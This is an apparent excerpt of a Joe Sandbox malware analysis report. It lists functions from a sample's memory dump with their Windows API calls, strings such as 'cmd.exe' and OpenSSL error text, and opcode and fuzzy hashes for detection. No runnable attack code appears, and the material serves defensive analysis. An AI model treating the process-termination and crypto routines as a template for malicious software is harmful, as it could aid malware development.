                                                                                                                                                                                                                                        • Opcode ID: bdd583901cd0eb1ff6a43a4fc0efc7d8b3549654f07c9a6256ee8d3e825696c9
                                                                                                                                                                                                                                        • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bdd583901cd0eb1ff6a43a4fc0efc7d8b3549654f07c9a6256ee8d3e825696c9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004235B1
                                                                                                                                                                                                                                          • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042364A
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00423680
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0042369D
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 004236F3
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00423726
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 0042375B
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1503770280-0
                                                                                                                                                                                                                                        • Opcode ID: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                                                                                                                                        • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37df39d3579e95a8e887addc41253b412796beb6f43eb533d1880f36d50fb082
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                                                                                        • Opcode ID: 719ee6fcb2298d1b002f77eaf5d8485eb079b0a0bda08e489b02245ded731d5b
                                                                                                                                                                                                                                        • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 719ee6fcb2298d1b002f77eaf5d8485eb079b0a0bda08e489b02245ded731d5b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                                                                                        • Opcode ID: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                                                                                                        • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb95cca08c5137960df09b2932dfcea505f4a1a4214bf1a69b91f53fd9b4b180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,75AF4E90), ref: 0040F338
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                        • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                                                                                                                                                        • API String ID: 2574300362-2555811374
                                                                                                                                                                                                                                        • Opcode ID: 7bc3ac448c7b3a5af6e1c20c5236c889343e43b234a764f11d033459d4baacc3
                                                                                                                                                                                                                                        • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bc3ac448c7b3a5af6e1c20c5236c889343e43b234a764f11d033459d4baacc3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                                                                                        • Opcode ID: 9504f033fcce7133fde4679d08226def18d84ccae4e6678b5cc4137127befaca
                                                                                                                                                                                                                                        • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9504f033fcce7133fde4679d08226def18d84ccae4e6678b5cc4137127befaca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                                                                                        • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                                                        • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                                                                                        • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                                                                                                                                                        • API String ID: 1302938615-3129329331
                                                                                                                                                                                                                                        • Opcode ID: 971d9d698a671f16166e71a244131eb5e0c209e0610a0f0b5b3b839bc1fd0eaa
                                                                                                                                                                                                                                        • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 971d9d698a671f16166e71a244131eb5e0c209e0610a0f0b5b3b839bc1fd0eaa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,0041EE2F), ref: 00411B1E
                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B29
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,0041EE2F), ref: 00411B72
                                                                                                                                                                                                                                        • timeGetTime.WINMM(?,?,0041EE2F), ref: 00411B78
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3697694649-0
                                                                                                                                                                                                                                        • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                                                        • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00425141
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                                                                                                                                                          • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                                                                                                                                                        • __mtterm.LIBCMT ref: 0042514F
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                                                                                                                                                          • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00425174
                                                                                                                                                                                                                                        • __initptd.LIBCMT ref: 00425196
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                                                                                        • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                                                                                                        • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004253AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 0042594A
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                                                                                                                                                                          • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(?,?,004250D7,0000000D), ref: 00428B22
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00425970
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042500D,?,00423F7C,?,0041E6CC,00000000,?,?,?,?,?,004CB3EC), ref: 00420C13
                                                                                                                                                                                                                                        • __lock.LIBCMT ref: 00425989
                                                                                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00425998
                                                                                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 004259C4
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                                                                                        • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                                                        • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.4516919390.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                                                                                        • Opcode ID: 6d0e854b80ffd72347278f6bb16eab8531bb2b7fdd0e65446e68d8b4e3059bbe
